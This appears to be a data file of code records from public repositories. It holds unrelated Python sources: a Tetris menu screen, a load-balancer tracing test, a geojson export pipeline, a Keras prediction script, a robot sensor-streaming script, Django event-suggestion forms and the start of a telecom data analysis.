Globals\nfrom InputProcessor import InputProcessor\nfrom playsound import playsound\n\ngb = Globals\n\nclass ScreenMainMenu:\n OFFSET_FROM_CENTER: float = 50\n SELECTION_SPACING: float = 10\n\n MenuSelection = 
collections.namedtuple(\"MenuItem\", [\"name\", \"surface\", \"rect\", \"selected\"])\n\n def __init__(self) -> None:\n self.title_logo: pygame.Surface = None\n self.title_logo_rc = [0,0,0,0]\n self.menu_selections = [\"Start\", \"Controls\", \"Credits\"]\n self.menu_dict = {}\n self.selection: int = 0\n\n self.off_font_colour = \"darkgray\"\n self.on_font_colour = \"white\"\n self.font: pygame.font.SysFont = None\n self.font_family = \"Comic Sans MS\"\n self.font_size = 30\n\n self.controls = [\"ARROWS : Move\",\n \"SHIFT : Rotate\",\n \"ENTER : Speed\",\n \"ESC : Main Menu\"]\n self.controls_rc = [0,0,0,0]\n self.controls_surface: pygame.Surface = None\n self.show_controls = False\n\n self.init()\n\n\n def init(self):\n self.init_title()\n self.init_menu()\n self.init_controls_menu()\n self.highlight_menu(self.menu_selections[self.selection])\n\n # setup title-logo\n def init_title(self):\n # load the title image\n self.title_logo = pygame.image.load(\"images/title.png\")\n\n # calculate scale factor to fit in screen\n scale = (gb.screen_width / self.title_logo.get_width()) / 1.5\n\n # fill the rect with the scale-factors\n self.title_logo_rc = pygame.Rect([\n 0, \n 0, \n int(scale * self.title_logo.get_width()), \n int(scale * self.title_logo.get_height())])\n\n # move to center of the screen\n self.title_logo_rc.move_ip(gb.screen_width / 2 - self.title_logo_rc.width / 2, 25)\n\n # scale the image with calculated scaled-rect\n self.title_logo = pygame.transform.scale(self.title_logo, self.title_logo_rc.size)\n #self.title_logo_rc = [title_rect.left, title_rect.top, title_rect.right, title_rect.bottom] \n\n\n # setup menu selections\n def init_menu(self):\n # setup font\n self.font = pygame.font.SysFont(self.font_family, self.font_size)\n\n # setup surfaces for all menus\n for i in range(len(self.menu_selections)):\n surface = self.font.render(self.menu_selections[i], True, self.off_font_colour)\n \n # setup each menu's rect\n rect = surface.get_rect()\n r = pygame.Rect(\n gb.screen_width / 2 - rect.width / 2, \n gb.screen_height / 2 - rect.height / 2 + (i * rect.height) + (i * ScreenMainMenu.SELECTION_SPACING) + ScreenMainMenu.OFFSET_FROM_CENTER,\n gb.screen_width / 2 + rect.width / 2, \n gb.screen_height / 2 + rect.height + (i * rect.height) + (i * ScreenMainMenu.SELECTION_SPACING) + ScreenMainMenu.OFFSET_FROM_CENTER )\n \n # create new updated tuple\n new_menu_item = ScreenMainMenu.MenuSelection(self.menu_selections[i], surface, r, False)\n\n # add new tuple to dictionary\n self.menu_dict.update({self.menu_selections[i] : new_menu_item})\n\n \n # setup menu selections\n def init_controls_menu(self):\n # setup font\n font = pygame.font.SysFont(self.font_family, int(self.font_size / 1.5))\n\n # get height and width of current font\n font_height = font.size('A')[1]\n font_width = font.size('a')[0]\n\n # get dimensions of the text that will be drawn\n max_width = max([len(x) for x in self.controls])\n max_width *= font_width\n max_height = (font_height + ScreenMainMenu.SELECTION_SPACING) * len(self.controls)\n\n # create surface to fit calculations above\n surface = pygame.Surface((max_width, max_height))\n\n # fill surface with normal background for consistency\n surface.fill(gb.grid_bk_colour)\n\n # setup surfaces for all menus\n for i in range(len(self.controls)):\n #render current line onto surface\n sub_surface = font.render(self.controls[i], True, self.on_font_colour)\n \n # get rect for text drawn, and paste it onto main-surface\n rect = sub_surface.get_rect()\n 
surface.blit(sub_surface, (0, (i * rect.height) + (i * ScreenMainMenu.SELECTION_SPACING)))\n\n # update member-variables\n self.controls_surface = surface\n self.controls_rc = pygame.Rect(gb.screen_width - surface.get_width() - 10,\n gb.screen_height / 2 - max_height / 2 + 100,\n gb.screen_width + surface.get_width() + 10,\n max_height + 100)\n\n\n # highlight menu\n def highlight_menu(self, menu_name: str):\n # if menu doesn't exist then return\n if(menu_name not in self.menu_dict):\n return\n \n # if menu-to-select is already selected (highlighted)\n if(self.menu_dict.get(menu_name).selected == True):\n return\n \n # find menu to be highlighted\n menu_item_select = self.menu_dict.get(menu_name)\n\n # find menu to be de-highlighted\n menu_list = list(self.menu_dict.values())\n menu_items_unselect = [i for i in menu_list if i.selected == True]\n\n # draw highlighted version\n new_surface = self.font.render(menu_item_select.name, True, self.on_font_colour)\n \n # update dictionary\n menu_item_select = menu_item_select._replace(surface = new_surface, selected = True)\n self.menu_dict.pop(menu_name)\n self.menu_dict.update({menu_name : menu_item_select})\n\n # de-highlight others\n for item_name in menu_items_unselect:\n # render with 'off-colour'\n new_surface = self.font.render(item_name.name, True, self.off_font_colour)\n\n # update dictionary\n updated_item = self.menu_dict.get(item_name.name)._replace(surface = new_surface, selected = False)\n self.menu_dict.pop(item_name.name)\n self.menu_dict.update({item_name.name : updated_item})\n\n\n # do selection logic\n def do_selection_logic(self, selection: int):\n # if controls is selected, then toggle show-controls flag\n if (self.menu_selections[selection].lower() == \"controls\"):\n self.show_controls = not self.show_controls\n\n # highlight the selected menu\n result = self.highlight_menu(self.menu_selections[self.selection])\n playsound(\"sounds/menu_select.wav\", False)\n return result\n \n\n # key-down event\n def keydown_down(self, *args):\n # select next selection\n self.selection += 1\n\n # if selection is > number of selections, then loop back\n if(self.selection >= len(self.menu_selections)):\n self.selection = 0\n\n # play click sound\n playsound(\"sounds/menu_select.wav\", False)\n\n # do selection logic\n self.highlight_menu(self.menu_selections[self.selection])\n\n\n # key-up event\n def keydown_up(self, *args):\n # select previous selection\n self.selection -= 1\n\n # if selection is < 0, then loop back\n if(self.selection < 0):\n self.selection = len(self.menu_selections) - 1\n\n # play click sound\n playsound(\"sounds/menu_select.wav\", False)\n\n # do selection logic\n self.highlight_menu(self.menu_selections[self.selection])\n\n\n # key-return event\n def keydown_return(self, *args):\n self.do_selection_logic(self.selection)\n return self.menu_selections[self.selection].lower()\n\n\n # draw all\n def draw(self, screen: pygame.Surface):\n # Fill the background\n screen.fill(gb.grid_bk_colour)\n\n # draw title\n screen.blit(self.title_logo, self.title_logo_rc)\n\n # draw buttons\n for item in self.menu_dict.values():\n screen.blit(item.surface, item.rect)\n\n # draw buttons\n if(self.show_controls == True):\n screen.blit(self.controls_surface, self.controls_rc)\n","repo_name":"RoboAI/Tetris-in-Pygame","sub_path":"ScreenMainMenu.py","file_name":"ScreenMainMenu.py","file_ext":"py","file_size_in_byte":8292,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} 
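Editor's note — illustrative sketch, not a dataset record: the ScreenMainMenu record above moves its highlighted menu entry by incrementing or decrementing a selection index with explicit bounds checks in keydown_up and keydown_down. A minimal self-contained version of that wrap-around navigation, assuming only the menu names from the record; every other name here is hypothetical:
menu_selections = ["Start", "Controls", "Credits"]
selection = 0

def move_selection(delta):
    """Advance the highlighted entry, wrapping past either end of the menu."""
    global selection
    # Modular arithmetic replaces the record's separate < 0 / >= len checks.
    selection = (selection + delta) % len(menu_selections)
    return menu_selections[selection]

assert move_selection(+1) == "Controls"   # down one entry
assert move_selection(-2) == "Credits"    # up two entries wraps below zero
assert move_selection(+1) == "Start"      # down past the end wraps to the top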
+{"seq_id":"12531471641","text":"import asyncio\n\nimport pytest\nimport yarl\nfrom aiohttp.client_exceptions import ServerTimeoutError\nfrom aiohttp.client_reqrep import ClientResponse\n\nfrom http_client.request_response import RequestBuilder, RequestResult\nfrom pytest_httpserver import HTTPServer\nfrom tests.test_balancing_base import BalancingClientMixin, TestBase\n\n\nclass TestBalancingTracing(TestBase, BalancingClientMixin):\n @pytest.fixture(scope=\"function\", autouse=True)\n def setup_method(self, working_server: HTTPServer):\n super().setup_method(working_server)\n self.register_ports_for_upstream('8081', '8082', '8083')\n\n def create_request_balancer(self, ok_server):\n test_request = RequestBuilder('test', 'test-app', '/test', 'GET')\n return self.request_balancer_builder.build(test_request, None, self.create_execute_request_callback(ok_server),\n None, False, False, False, False, False)\n\n @staticmethod\n def create_execute_request_callback(ok_server):\n async def execute_request(test_request: RequestBuilder) -> RequestResult:\n if test_request.host == ok_server.address:\n url = yarl.URL(test_request.url)\n client_response = ClientResponse(test_request.method, url, writer=None, continue100=None, timer=None,\n request_info=None, traces=None, loop=asyncio.get_event_loop(),\n session=None)\n client_response.status = 200\n result = RequestResult(test_request, client_response.status, response=client_response, elapsed_time=1)\n result.parse_response = False\n else:\n error_message = f'Failed to connect to {test_request.host}'\n result = RequestResult(test_request, 599, elapsed_time=0.1, exc=ServerTimeoutError(error_message))\n\n return result\n\n return execute_request\n\n async def test_tracing_without_retries(self):\n request_balancer = self.create_request_balancer(self.servers[0])\n await request_balancer.execute()\n\n expected_trace = \"127.0.0.1:8081~200~None\"\n actual_trace = request_balancer.get_trace()\n assert actual_trace == expected_trace\n\n async def test_tracing_with_retries(self):\n request_balancer = self.create_request_balancer(self.servers[2])\n await request_balancer.execute()\n\n expected_trace = \"127.0.0.1:8081~599~Failed to connect to 127.0.0.1:8081 -> \" \\\n \"127.0.0.1:8082~599~Failed to connect to 127.0.0.1:8082 -> \" \\\n \"127.0.0.1:8083~200~None\"\n actual_trace = request_balancer.get_trace()\n assert actual_trace == expected_trace\n","repo_name":"hhru/balancing-http-client","sub_path":"tests/test_balancing_tracing.py","file_name":"test_balancing_tracing.py","file_ext":"py","file_size_in_byte":2778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"22030719667","text":"import shutil\nimport sys\n\nfrom country_levels_lib.fips import fips_utils\nfrom country_levels_lib.config import export_dir, fixes_dir\nfrom country_levels_lib.geo import calculate_centroid, find_timezone\nfrom country_levels_lib.utils import read_json, osm_url, write_json, wikidata_url\nfrom country_levels_lib.wam.wam_collect import validate_iso1, validate_iso2, simp_dir\nfrom country_levels_lib.wam.wam_download import wam_data_dir\nfrom area import area\n\n\npopulation_map = None\npopulation_fixes = read_json(fixes_dir / 'population.json')\ntimezone_fixes = read_json(fixes_dir / 'timezone.json')\nus_states_by_postal = fips_utils.get_state_data()[1]\niso1_json = None\niso2_json = None\n\n\ndef split_geojson(iso_level: int, simp_level: str):\n global population_map, iso1_json, iso2_json\n if not population_map:\n 
population_map = read_json(wam_data_dir / 'population.json')\n\n if simp_level != 'high':\n iso1_json = read_json(export_dir / 'iso1.json')\n iso2_json = read_json(export_dir / 'iso2.json')\n\n print(f'Splitting iso{iso_level} to level: {simp_level}')\n file_path = simp_dir / simp_level / f'iso{iso_level}.geojson'\n\n features = read_json(file_path)['features']\n features_sorted = sorted(features, key=lambda i: i['properties']['admin_level'])\n\n features_by_iso = dict()\n\n for feature in features_sorted:\n feature_processed = process_feature_properties(feature, iso_level, simp_level)\n if feature_processed is None:\n continue\n feature_clean = feature_processed['feature']\n\n iso = feature_processed['iso']\n if iso_level == 1:\n if not validate_iso1(iso):\n print(f'invalid iso1: {iso}')\n continue\n else:\n if not validate_iso2(iso):\n print(f'invalid iso2: {iso}')\n continue\n\n features_by_iso.setdefault(iso, list())\n features_by_iso[iso].append(feature_clean)\n\n deduplicated_by_iso = deduplicate_features_by_iso(features_by_iso)\n write_json_and_geojsons(deduplicated_by_iso, iso_level, simp_level)\n\n\ndef process_feature_properties(feature: dict, iso_level: int, simp_level: str):\n prop = feature['properties']\n alltags = prop['alltags']\n\n name = prop.pop('name')\n osm_id = int(prop.pop('id'))\n iso = prop.pop(f'iso{iso_level}')\n countrylevel_id = f'iso{iso_level}:{iso}'\n\n if iso_level == 1:\n iso_json = iso1_json\n else:\n iso_json = iso2_json\n\n if simp_level == 'high':\n centroid = calculate_centroid(feature)\n center_lat = centroid['lat']\n center_lon = centroid['lon']\n area_m2 = int(area(feature['geometry']))\n else:\n center_lat = iso_json[iso]['center_lat']\n center_lon = iso_json[iso]['center_lon']\n area_m2 = iso_json[iso]['area_m2']\n\n if not feature['geometry']:\n print(f' missing geometry: {countrylevel_id}')\n if simp_level == 'high':\n sys.exit('high level missing geometry')\n\n geojson_path = iso_json[iso]['geojson_path']\n feature['geometry'] = get_geometry_from_medium_high(geojson_path)\n\n admin_level = int(prop.pop('admin_level'))\n wikidata_id = prop.pop('wikidata_id', None)\n population = population_map.get(wikidata_id)\n if countrylevel_id in population_fixes:\n if population:\n print(f'Population not needed anymore in fixes: {countrylevel_id}')\n population = population_fixes[countrylevel_id]\n\n timezone = alltags.pop('timezone', None)\n if not timezone:\n timezone = find_timezone(center_lon, center_lat)\n if not timezone:\n timezone = timezone_fixes.get(countrylevel_id)\n if not timezone:\n print(f'missing timezone for {countrylevel_id} {name}')\n\n # override population for US states from Census data\n if iso.startswith('US-'):\n postal_code = iso[3:]\n state_data = us_states_by_postal.get(postal_code, {})\n population_from_census = state_data.get('population')\n if population_from_census is not None:\n population = population_from_census\n\n wikipedia_from_prop = prop.pop('wikipedia', None)\n wikipedia_from_alltags = alltags.pop('wikipedia', None)\n if (\n wikipedia_from_prop\n and wikipedia_from_alltags\n and wikipedia_from_prop != wikipedia_from_alltags\n ):\n print(wikipedia_from_prop, wikipedia_from_alltags)\n wikipedia_id = wikipedia_from_alltags\n if wikipedia_from_prop:\n wikipedia_id = wikipedia_from_prop\n\n feature.pop('bbox', None)\n\n for key in ['boundary', 'note', 'rpath', 'srid', 'timestamp']:\n prop.pop(key, None)\n\n for key in [\n 'ISO3166-1',\n 'ISO3166-1:alpha2',\n 'ISO3166-1:numeric',\n 'ISO3166-2',\n 'ISO3166-2:alpha2',\n 
'ISO3166-2:numeric',\n        'land_area',\n        'wikidata',\n    ]:\n        alltags.pop(key, None)\n\n    new_prop = {\n        'name': name,\n        f'iso{iso_level}': iso,\n        'admin_level': admin_level,\n        'osm_id': osm_id,\n        'countrylevel_id': countrylevel_id,\n        'osm_data': prop,\n        'center_lat': round(center_lat, 2),\n        'center_lon': round(center_lon, 2),\n        'area_m2': area_m2,\n    }\n\n    if timezone:\n        new_prop['timezone'] = timezone\n\n    if population:\n        new_prop['population'] = population\n\n    if wikidata_id:\n        new_prop['wikidata_id'] = wikidata_id\n\n    if wikipedia_id:\n        new_prop['wikipedia_id'] = wikipedia_id\n\n    feature['properties'] = new_prop\n\n    return {\n        'feature': feature,\n        'iso': iso,\n    }\n\n\ndef deduplicate_features_by_iso(features_by_iso: dict):\n    deduplicated = {}\n    for iso, features in features_by_iso.items():\n        if len(features) == 1:\n            deduplicated[iso] = features[0]\n        else:\n            print(f'  duplicate features for: {iso}')\n            for feature in features:\n                prop = feature['properties']\n                name = prop['name']\n                admin_level = prop['admin_level']\n                osm_id = prop['osm_id']\n                population = prop.get('population')\n                wikidata_id = prop.get('wikidata_id')\n\n                print(\n                    f'    {name} '\n                    f'admin_level: {admin_level} '\n                    f'population: {population} '\n                    f'{osm_url(osm_id)} '\n                    f'{wikidata_url(wikidata_id)} '\n                )\n\n            # pick the first one by admin_level\n            features_sorted = sorted(features, key=lambda k: k['properties']['admin_level'])\n            deduplicated[iso] = features_sorted[0]\n            print()\n    return deduplicated\n\n\ndef write_json_and_geojsons(deduplicated_by_iso: dict, iso_level: int, simp_level: str):\n    assert iso_level in [1, 2]\n\n    level_subdir = export_dir / 'geojson' / simp_level / f'iso{iso_level}'\n    shutil.rmtree(level_subdir, ignore_errors=True)\n    level_subdir.mkdir(parents=True)\n\n    json_data = {}\n    for iso, feature in deduplicated_by_iso.items():\n        new_prop_without_osm_data = {\n            k: v for k, v in feature['properties'].items() if k != 'osm_data'\n        }\n        json_data[iso] = new_prop_without_osm_data\n\n        if iso_level == 1:\n            write_json(level_subdir / f'{iso}.geojson', feature)\n            json_data[iso]['geojson_path'] = f'iso1/{iso}.geojson'\n\n        else:\n            iso2_start, iso2_end = iso.split('-')\n\n            iso2_subdir = level_subdir / iso2_start\n            iso2_subdir.mkdir(exist_ok=True)\n\n            write_json(level_subdir / iso2_start / f'{iso}.geojson', feature)\n            json_data[iso]['geojson_path'] = f'iso2/{iso2_start}/{iso}.geojson'\n\n    if simp_level == 'high':\n        write_json(export_dir / f'iso{iso_level}.json', json_data, indent=2, sort_keys=True)\n\n\ndef get_geometry_from_medium_high(geojson_path):\n    medium_geojson_path = export_dir / 'geojson' / 'medium' / geojson_path\n    high_geojson_path = export_dir / 'geojson' / 'high' / geojson_path\n\n    if medium_geojson_path.is_file():\n        medium_geojson = read_json(medium_geojson_path)\n        if medium_geojson['geometry']:\n            print('  using geometry from medium geojson')\n            return medium_geojson['geometry']\n\n    high_geojson = read_json(high_geojson_path)\n    print('  using geometry from high geojson')\n    return high_geojson['geometry']\n","repo_name":"hyperknot/country-levels","sub_path":"country_levels_lib/wam/wam_export.py","file_name":"wam_export.py","file_ext":"py","file_size_in_byte":8422,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"63"}
+{"seq_id":"23120667317","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n# Project practice discussion QQ group 630011153 144081101\n# https://github.com/china-testing/python-api-tesing/blob/master/practices/keras/test_kaggle_natural.py\n# 
Dataset: https://itbooks.pipipan.com/fs/18113597-329046186\n# CreateDate: 2019-01-04\nfrom keras.preprocessing.image import ImageDataGenerator\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom keras.models import load_model\n\n\ntrain_path = 'images/train/'\ntest_path = 'images/test/'\nbatch_size = 16\nimage_size = 224\nnum_class = 8\n\n\nmodel = load_model('fine_tune.h5')\n\ntrain_datagen = ImageDataGenerator()\n\ntrain_generator = train_datagen.flow_from_directory(\n    directory=train_path, target_size=(image_size,image_size),\n    batch_size=batch_size, class_mode='categorical',\n    color_mode='rgb', shuffle=True)\n\n\ntest_datagen = ImageDataGenerator()\n\ntest_generator = test_datagen.flow_from_directory(\n    directory=test_path, target_size=(image_size, image_size),\n    color_mode='rgb', shuffle=False, class_mode='categorical', batch_size=1)\n\nfilenames = test_generator.filenames\nnb_samples = len(filenames)\n\nfig=plt.figure()\ncolumns = 4\nrows = 4\nfor i in range(1, columns*rows -1):\n    x_batch, y_batch = test_generator.next()\n\n    name = model.predict(x_batch)\n    name = np.argmax(name, axis=-1)\n    true_name = y_batch\n    true_name = np.argmax(true_name, axis=-1)\n\n    label_map = (test_generator.class_indices)\n    label_map = dict((v,k) for k,v in label_map.items()) #flip k,v\n    predictions = [label_map[k] for k in name]\n    true_value = [label_map[k] for k in true_name]\n\n    image = x_batch[0].astype(np.int)\n    fig.add_subplot(rows, columns, i)\n    plt.title(str(predictions[0]) + ':' + str(true_value[0]))\n    plt.imshow(image)\nplt.show()","repo_name":"china-testing/python-api-tesing","sub_path":"practices/keras/test_kaggle_natural.py","file_name":"test_kaggle_natural.py","file_ext":"py","file_size_in_byte":1752,"program_lang":"python","lang":"en","doc_type":"code","stars":2314,"dataset":"github-code","pt":"63"}
+{"seq_id":"20959082771","text":"import sys\nimport time\n\nsys.path.append('/home/pi/sphero-sdk-raspberrypi-python')\n\nfrom sphero_sdk import SpheroRvrObserver\nfrom sphero_sdk import RvrStreamingServices\n\nimport qwiic\nrvr = SpheroRvrObserver()\n\n# Variables to store VL53L1X sensors\ntof_fw = None\ntof_bw = None\n\n# Dict to store current RVR position\nposition = {\"x\":0, \"y\":0, \"yaw\":0}\n\n# Change VL53L1X I2C addresses and initialize ranging\n# Sensor on MUX channel 3 should get address 0x28\n# Sensor at MUX channel 4 can keep the default 0x29\ndef init_tof():\n    global tof_fw, tof_bw\n    # Get MUX\n    mux = qwiic.QwiicTCA9548A()\n    mux.disable_all()\n    # Enable channel for forward range sensor\n    mux.enable_channels([3])\n    # Check if already configured\n    avail_addresses = qwiic.scan()\n    print(avail_addresses)\n    if 0x29 in avail_addresses:\n        tof_fw = qwiic.QwiicVL53L1X(0x29)\n        tof_fw.sensor_init()\n        # Change address\n        tof_fw.set_i2c_address(0x28)\n    else: \n        tof_fw = qwiic.QwiicVL53L1X(0x28)\n        tof_fw.sensor_init()\n\n    # Enable channel for backward range sensor\n    mux.enable_channels([3, 4])\n    tof_bw = qwiic.QwiicVL53L1X(0x29)\n    tof_bw.sensor_init()\n\n    # Enable sensors\n    time.sleep(0.1)\n    tof_fw.start_ranging()\n    tof_bw.start_ranging()\n\n# Callback functions for sensor data streaming service\ndef locator_handler(data):\n    if data['Locator']['is_valid']:\n        global position\n        position['x'] = data['Locator']['X']\n        position['y'] = data['Locator']['Y']\n\ndef imu_handler(data):\n    if data['IMU']['is_valid']:\n        global position\n        position['yaw'] = data['IMU']['Yaw']\n\n\ndef main():\n    rvr.wake()\n    init_tof()\n    # Give RVR time to wake up\n    time.sleep(2)\n    # Reset position\n    
rvr.drive_control.reset_heading()\n rvr.reset_locator_x_and_y()\n time.sleep(0.5)\n\n # Bind streaming services to handler functions\n rvr.sensor_control.add_sensor_data_handler(\n service=RvrStreamingServices.imu,\n handler=imu_handler\n )\n rvr.sensor_control.add_sensor_data_handler(\n service=RvrStreamingServices.locator,\n handler=locator_handler\n )\n rvr.sensor_control.start(interval=100) # Start streaming at fixed interval (ms)\n\n while True:\n # Delay to allow RVR to stream sensor data\n time.sleep(0.2)\n fw_range = tof_fw.get_distance()\n bw_range = tof_bw.get_distance() \n\n print( \"X: \" + f'{position[\"x\"]:.3f}' + \"m\" +\n \"\\tY: \" + f'{position[\"y\"]:.3f}' + \"m\" +\n \"\\tYaw: \" + f'{position[\"yaw\"]:.1f}' + \"deg\" + \n \"\\tRange F: \" + f'{fw_range*1e-3:.3f}' + \"mm\" +\n \"\\tRange B: \" + f'{bw_range*1e-3:.3f}' + \"mm\"\n )\n\n\n# Start main loop if script is run directly\nif __name__ == '__main__':\n # Wrap in try-catch to handle \n try:\n main()\n except KeyboardInterrupt:\n print('\\nProgram terminated with keyboard interrupt.')\n finally:\n rvr.sensor_control.clear()\n tof_fw.stop_ranging()\n tof_bw.stop_ranging()\n # Delay to allow RVR issue command before closing\n time.sleep(.5)\n rvr.close()\n","repo_name":"vinjarv/AIS2203-rvr","sub_path":"Raspberry_Pi/examples/sensor-streaming.py","file_name":"sensor-streaming.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"28805796627","text":"from django import forms\nfrom django.template.defaultfilters import slugify\nfrom django.conf import settings\n\nfrom airmozilla.base.forms import BaseModelForm\nfrom airmozilla.main.models import (\n SuggestedEvent,\n Event,\n Tag,\n Channel,\n SuggestedEventComment\n)\n\n\nclass StartForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('title',)\n\n def __init__(self, *args, **kwargs):\n self.user = kwargs.pop('user')\n super(StartForm, self).__init__(*args, **kwargs)\n\n def clean_title(self):\n value = self.cleaned_data['title']\n if Event.objects.filter(title__iexact=value):\n raise forms.ValidationError(\"Event title already used\")\n if SuggestedEvent.objects.filter(title__iexact=value, user=self.user):\n raise forms.ValidationError(\n \"You already have a suggest event with this title\"\n )\n return value\n\n\nclass TitleForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('title', 'slug')\n\n def clean_slug(self):\n value = self.cleaned_data['slug']\n if value:\n if Event.objects.filter(slug__iexact=value):\n raise forms.ValidationError('Already taken')\n return value\n\n def clean_title(self):\n value = self.cleaned_data['title']\n if Event.objects.filter(title__iexact=value):\n raise forms.ValidationError(\"Event title already used\")\n return value\n\n def clean(self):\n cleaned_data = super(TitleForm, self).clean()\n if 'slug' in cleaned_data and 'title' in cleaned_data:\n if not cleaned_data['slug']:\n cleaned_data['slug'] = slugify(cleaned_data['title'])\n if Event.objects.filter(slug=cleaned_data['slug']):\n raise forms.ValidationError('Slug already taken')\n return cleaned_data\n\n\nclass DescriptionForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('description', 'short_description')\n\n def __init__(self, *args, **kwargs):\n super(DescriptionForm, self).__init__(*args, **kwargs)\n self.fields['description'].help_text = (\n \"Write a description of your event that will entice viewers to \"\n 
\"watch.<br>\"\n \"An interesting description improves the chances of your \"\n \"presentation being picked up by bloggers and other websites.\"\n \"<br>\"\n \"Please phrase your description in the present tense. \"\n )\n self.fields['short_description'].help_text = (\n \"This Short Description is used in public feeds and tweets. \"\n \"<br>If your event is non-public be careful \"\n \"<b>not to \"\n \"disclose sensitive information here</b>.\"\n \"<br>If left blank the system will use the first few \"\n \"words of the description above.\"\n )\n\n\nclass DetailsForm(BaseModelForm):\n\n tags = forms.CharField(required=False)\n\n class Meta:\n model = SuggestedEvent\n fields = (\n 'location',\n 'start_time',\n 'privacy',\n 'category',\n 'tags',\n 'channels',\n 'additional_links',\n 'remote_presenters',\n )\n\n def __init__(self, *args, **kwargs):\n super(DetailsForm, self).__init__(*args, **kwargs)\n self.fields['channels'].required = False\n self.fields['location'].required = True\n self.fields['start_time'].required = True\n if 'instance' in kwargs:\n event = kwargs['instance']\n if event.pk:\n tag_format = lambda objects: ','.join(map(unicode, objects))\n tags_formatted = tag_format(event.tags.all())\n self.initial['tags'] = tags_formatted\n\n self.fields['location'].help_text = (\n \"Choose an Air Mozilla origination point. <br>\"\n \"If the location of your event isn't on the list, \"\n \"choose Live Remote. <br>\"\n \"Note that live remote dates and times are UTC.\"\n )\n self.fields['tags'].help_text = (\n \"Enter some keywords to help viewers find the recording of your \"\n \"event. <br>Press return between keywords\"\n )\n self.fields['channels'].help_text = (\n \"Should your event appear in one or more particular \"\n \"Air Mozilla Channels? <br>If in doubt, select Main.\"\n )\n self.fields['additional_links'].help_text = (\n \"If you have links to slides, the presenter's blog, or other \"\n \"relevant links, list them here and they will appear on \"\n \"the event page.\"\n )\n self.fields['remote_presenters'].help_text = (\n \"If there will be presenters who present remotely, please enter \"\n \"email addresses, names and locations about these presenters.\"\n )\n\n self.fields['additional_links'].widget.attrs['rows'] = 3\n self.fields['remote_presenters'].widget.attrs['rows'] = 3\n\n def clean_tags(self):\n tags = self.cleaned_data['tags']\n split_tags = [t.strip() for t in tags.split(',') if t.strip()]\n final_tags = []\n for tag_name in split_tags:\n t, __ = Tag.objects.get_or_create(name=tag_name)\n final_tags.append(t)\n return final_tags\n\n def clean_channels(self):\n channels = self.cleaned_data['channels']\n if not channels:\n channels.append(\n Channel.objects.get(slug=settings.DEFAULT_CHANNEL_SLUG)\n )\n return channels\n\n\nclass PlaceholderForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEvent\n fields = ('placeholder_img',)\n\n def __init__(self, *args, **kwargs):\n super(PlaceholderForm, self).__init__(*args, **kwargs)\n self.fields['placeholder_img'].help_text = (\n \"We need a placeholder image for your event. <br>\"\n \"A recent head-shot of the speaker is preferred. 
<br>\"\n \"Placeholder images should be 200 x 200 px or larger.\"\n )\n\n#class ParticipantsForm(BaseModelForm):\n#\n# participants = forms.CharField(required=False)\n#\n# class Meta:\n# model = SuggestedEvent\n# fields = ('participants',)\n#\n# def clean_participants(self):\n# participants = self.cleaned_data['participants']\n# split_participants = [p.strip() for p in participants.split(',')\n# if p.strip()]\n# final_participants = []\n# for participant_name in split_participants:\n# p = Participant.objects.get(name=participant_name)\n# final_participants.append(p)\n# return final_participants\n#\n\n\nclass SuggestedEventCommentForm(BaseModelForm):\n\n class Meta:\n model = SuggestedEventComment\n fields = ('comment',)\n","repo_name":"einBambi/airmozilla","sub_path":"airmozilla/suggest/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":6975,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"63"} +{"seq_id":"16009028239","text":"import numpy as np\nimport pandas as pd\nimport os\nos.chdir('/home/vasste/ml')\nfrom telecom.train_columns import *\nos.chdir('/home/vasste/mlbootcap/TelecomDataCup/dataset')\n\nc = pd.read_pickle('train/subs_csi_train.pk')\nf = pd.read_pickle('train/subs_features_train.pk')\nf['COM_CAT#34'] = f['COM_CAT#34'].fillna(f.describe()['COM_CAT#34']['75%'], axis=0)\nf['COM_CAT#34'] = f['COM_CAT#34'].astype(int)\n\nf = f.join(c)\ntarget = 'CSI'\ndf = f\nfeature = 'COM_CAT#34'\nfor i in ['COM_CAT#1', 'COM_CAT#34', 'COM_CAT#2', 'COM_CAT#3', 'INTERNET_TYPE_ID', 'DEVICE_TYPE_ID',\n 'COM_CAT#25', 'COM_CAT#26', 'ACT']:\n f[i] = f[i].astype('category')\n lst = []\n for i in range(df[feature].nunique()):\n val = list(df[feature].unique())[i]\n lst.append([feature, # Variable\n val, # Value\n df[df[feature] == val].count()[feature], # All\n df[(df[feature] == val) & (df[target] == 0)].count()[feature], # Good (think: Fraud == 0)\n df[(df[feature] == val) & (df[target] == 1)].count()[feature]]) # Bad (think: Fraud == 1)\n\n data = pd.DataFrame(lst, columns=['Variable', 'Value', 'All', 'Good', 'Bad'])\n\n data['Share'] = data['All'] / data['All'].sum()\n data['Bad Rate'] = data['Bad'] / data['All']\n data['Distribution Good'] = (data['All'] - data['Bad']) / (data['All'].sum() - data['Bad'].sum())\n data['Distribution Bad'] = data['Bad'] / data['Bad'].sum()\n data['WoE'] = np.log(data['Distribution Good'] / data['Distribution Bad'])\n\n data = data.replace({'WoE': {np.inf: 0, -np.inf: 0}})\n\n data['IV'] = data['WoE'] * (data['Distribution Good'] - data['Distribution Bad'])\n\n data = data.sort_values(by=['Variable', 'Value'], ascending=[True, True])\n data.index = range(len(data.index))\n print(data)\n\n\n\n\nimport numpy as np\nimport pandas as pd\nimport os\nos.chdir('/home/vasste/ml')\nfrom telecom.train_columns import *\nos.chdir('/home/vasste/mlbootcap/TelecomDataCup/dataset')\n\nf = pd.read_pickle('train/subs_features_train.pk')\nc = pd.read_pickle('train/subs_csi_train.pk')\nfor i in ['1', '2', '3', '34', '8']:\n for j in ['32', '33', '17']:\n f['COM_CAT#' + i + j] = f['COM_CAT#' + i] * f['COM_CAT#' + j]\n\nfor i in ['ARPU_GROUP', 'RENT_CHANNEL', 'ITC', 'VAS']:\n for 